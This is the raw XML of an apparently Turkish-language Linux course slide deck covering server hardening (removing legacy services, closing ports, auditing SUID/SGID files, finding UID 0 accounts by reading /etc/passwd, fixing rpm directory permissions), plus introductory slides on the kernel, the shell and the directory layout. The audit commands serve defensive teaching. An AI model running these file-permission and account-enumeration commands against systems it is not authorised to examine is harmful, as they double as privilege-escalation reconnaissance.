              </a:lnSpc>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Gereksiz hizmetleri devre dışı bırakmak, saldırı yüzeyini azaltacaktır, bu nedenle aşağıdaki eski hizmetleri Linux sunucusunda bulursanız kaldırmak önemlidir:</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Telnet server</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RSH server</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NIS server</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TFTP server</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TALK server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="846" name="Google Shape;846;p106"/>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3"/>
              </a:rPr>
              <a:t>pluralsight.com</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="847" name="Google Shape;847;p106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114325" y="907863"/>
            <a:ext cx="4615199" cy="36952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1" name="Shape 851"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="852" name="Google Shape;852;p10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Açık portları kapat</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="853" name="Google Shape;853;p107"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="391750" y="1298726"/>
            <a:ext cx="8272526" cy="1985700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="854" name="Google Shape;854;p10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4"/>
              </a:rPr>
              <a:t>pluralsight.com</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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58" name="Shape 858"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="Google Shape;859;p10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suid ve guid programların takibi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860" name="Google Shape;860;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>
            <a:ext cx="87510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find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls-la {} \;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Google Shape;861;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="1166725"/>
            <a:ext cx="8751000" cy="36234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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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find /: Arama işlemine / dizininden başlar. Tüm dizinleri ve alt dizinleri tarar.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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-type f: Sadece düz dosyaları seçer: dizin, sembol, bağlantı gibi dosyaları taramaz.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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 ve \) : setuid ve setgid özelliğine sahip dosyaları bulmak için ifadeleri birleştirir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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-perm -04000 -o -perm -02000: Dosyaların setuid (-perm -04000) veya setgid (-perm -02000) özelliklerine sahip olup olmadığını kontrol eder.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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-exec ls -la {} \;: Her eşleşen dosyaların </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ayrıntılı listesini (izinler, sahiplik, vb.) ekrana basmak</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> için ls -la komutunu çağırır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>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65" name="Shape 865"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="866" name="Google Shape;866;p10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“root” olabilecek kullanıcıların belirlenmesi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Google Shape;867;p109"/>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Root haricinde UID=0 olan kullanıcı olmamalıdır.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Sürüm bilgisi alınan bir yazılım için açıklık taramak son derece kolaydır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;868;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20010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cat /etc/passwd | /bin/awk -F: '($2 == 0) { print $1 }'</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200100" y="12331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chmod 750 /var/lib/rpm</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Google Shape;870;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200100" y="1808213"/>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chown rpm:rpm /var/lib/rpm/*</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="871" name="Google Shape;871;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200100" y="2379638"/>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chmod 700 /var/lib/rpm/*</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10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="-24750"/>
            <a:ext cx="8722500" cy="5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uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Sorular</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="877" name="Google Shape;877;p110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="9633"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="514050"/>
            <a:ext cx="9144000" cy="4362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Linux çekirdeği (Kernel)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Google Shape;105;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4941575" y="980275"/>
            <a:ext cx="3781876" cy="3182950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253400" y="823575"/>
            <a:ext cx="4498200" cy="3621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en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İşletim sisteminin donanımla diğer uygulamalar arasındaki iletişimi sağlayan parçasına “çekirdek” (kernel) denir.</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Sistemin temel çalışmasından sorumludur.</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Linux çekirdeği Açık kaynaklı olduğundan, isteğe göre farklı şekilde derlenebilir.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p17"/>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Jagadish Hiremath from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>medium</a:t>
            </a:r>
            <a:endParaRPr sz="1000" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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1" name="Shape 111"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p18"/>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Linux kabuğu (Shell)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Google Shape;113;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4941575" y="980275"/>
            <a:ext cx="3781876" cy="3182950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253400" y="823575"/>
            <a:ext cx="4498200" cy="3621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Char char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kullanıcının işletim sistemiyle iletişimini sağlayan program</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Verilen komutları işletim sistemine ve komutların çıktılarını kullanıcıya iletir.</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Farklı kabuk programları bulunmaktadır. Linux'ta genellikle “bash” kullanılır.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zhs, sh …</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p1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Jagadish Hiremath from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>medium</a:t>
            </a:r>
            <a:endParaRPr sz="1000" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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1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Linux dizin yapısı: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>root@computer# ls /</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="121" name="Google Shape;121;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1005550"/>
            <a:ext cx="8839200" cy="3132391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p1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https://www.serverkaka.com/2018/01/key-locations-in-linux-file-system_21.html</a:t>
            </a:r>
            <a:endParaRPr sz="1000" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFF2C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6" name="Shape 126"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p20"/>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Linux dizin yapısı: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>root@computer# ls /</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="128" name="Google Shape;128;p20"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="221860" y="635843"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{1ED9964D-1338-4093-AAAA-D3ECB9C76E77}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="634500"/>
                <a:gridCol w="8123875"/>
              </a:tblGrid>
              <a:tr h="316400">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Linux dosya sisteminin en üst düzeyidir. Tüm diğer dosya ve dizinler bu kök dizini altında bulunur.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/bin</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Temel sistem uygulamalarını ve komut dosyalarını içerir. Kullanıcıların sistemle etkileşimde bulunması için gerekli olan temel araçları içerir.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/boot</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Sistem açılırken kullanılan çekirdek dosyaları ve önyükleme konfigürasyon dosyalarını içerir.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/dev</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Cihaz dosyalarını içerir. Bu dosyalar, sistemdeki donanım ve diğer cihazları temsil eder.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/etc</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Sistem yapılandırma dosyalarını içerir. Bu dizinde, sistem ve uygulama ayarları, konfigürasyon dosyaları bulunur.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/home</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Kullanıcıların ev dizinlerini içerir. Her kullanıcı, bu dizinde kendi kişisel dosya ve alt dizinlere sahiptir.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/lib</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Paylaşılan kütüphane dosyalarını içerir. Uygulamalar bu kütüphaneleri kullanarak çalışır.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/mnt</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Harici cihazları, örneğin CD-ROM'lar veya USB sürücülerini geçici olarak bağlamak için kullanılır.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/opt</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Opsiyonel yazılımların veya uygulamaların kurulduğu dizindir.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/proc</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Kernel ve çalışan süreçlere ilişkin bilgileri içeren sanal bir dosya sistemidir.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/tmp</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Geçici dosyaların depolandığı bir dizindir. Bu dosyalar genellikle sistem yeniden başlatıldığında silinir.</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="900">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="100000">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/usr</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Kullanıcıların yürütülebilir dosyalarını, kütüphanelerini ve kaynak dosyalarını içerir. Genellikle sistemdeki büyük uygulamalar burada bulunur.</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="900">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="320275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/var</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="9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b="1" lang="en-US" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Değişken verileri içerir. Bu dizinde sistem günlükleri, veritabanları, web sunucu dosyaları gibi dinamik veriler bulunur.</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="900">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>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60F"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="133" name="Shape 133"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3456425" y="2414800"/>
            <a:ext cx="5144700" cy="43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3400"/>
              <a:t>Temel komutlar</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135" name="Google Shape;135;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="24568" l="0" r="6200" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="646025" y="1354625"/>
            <a:ext cx="2674826" cy="16131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9" name="Shape 139"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p22"/>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Oturum komutları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>
            <a:ext cx="4115400" cy="12075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b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> $ pwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
